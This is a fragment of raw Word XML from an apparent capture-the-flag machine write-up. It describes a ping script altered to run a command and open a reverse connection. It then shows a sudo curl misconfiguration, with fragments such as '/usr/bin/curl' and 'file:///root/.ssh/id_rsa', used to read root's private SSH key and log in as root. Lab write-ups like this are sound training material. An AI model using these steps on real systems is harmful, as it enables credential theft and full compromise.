          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ping</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> script was executed, now containing the malicious command, resulting in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command execution on the system.</w:t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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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reverse connection was received as the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vito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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is located in the home directory of user vito </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(/home/vito).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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y8nkiwhdw06z" w:id="5"/>
      <w:bookmarkEnd w:id="5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Privilege Escalation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sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command showed that user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vito</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has permission to execute the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl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command as root without requiring a password.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1092200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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  <w:t xml:space="preserve">When executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl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root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is possible to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read system files with root privileges</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using 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file:///</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> scheme, allowing access to restricted system files.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  <w:t xml:space="preserve">It was possible to read the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/.ssh/id_rsa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curl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executed as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root user’s private SSH key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which allows remote access to the system with administrative privileges.</w:t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/usr/bin/curl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file:///root/.ssh/id_rsa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1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private key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onnect to the machin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, obtaining</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> access as root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4551490"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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149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root flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(/root/)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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09800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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45" w:type="default"/>
      <w:headerReference r:id="rId46" w:type="first"/>
      <w:headerReference r:id="rId47" w:type="even"/>
      <w:footerReference r:id="rId48" w:type="default"/>
      <w:footerReference r:id="rId49" w:type="first"/>
      <w:footerReference r:id="rId50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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289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All rights reserved</w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                           Page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6">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.fhhv04y2ormh" w:id="6"/>
    <w:bookmarkEnd w:id="6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-866770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98" name="image6.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic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7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8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9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8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Reborn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86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30156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BM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24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3.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId45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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId4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pp.hackingclub.com/training/training-machines/294#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5.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png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15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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jp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39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0m9PuhcUc2wQmbT3ca5Hv/OPGw==">CgMxLjAyDmgubGFiNXljNms3aXpoMg1oLjdjcTl4ODJicHNqMg5oLjh1MjVhc2h3amhlMTIOaC5hZ2Jzcmh6YWg5czUyDmgudGhrM2Nsb3E1ZTgwMg5oLnk4bmtpd2hkdzA2ejIOaC5maGh2MDR5Mm9ybWg4AHIhMTN0VGZVZ2UzTVQtYk9zOTU1MUxYNndPSnJfVDc1dVRZ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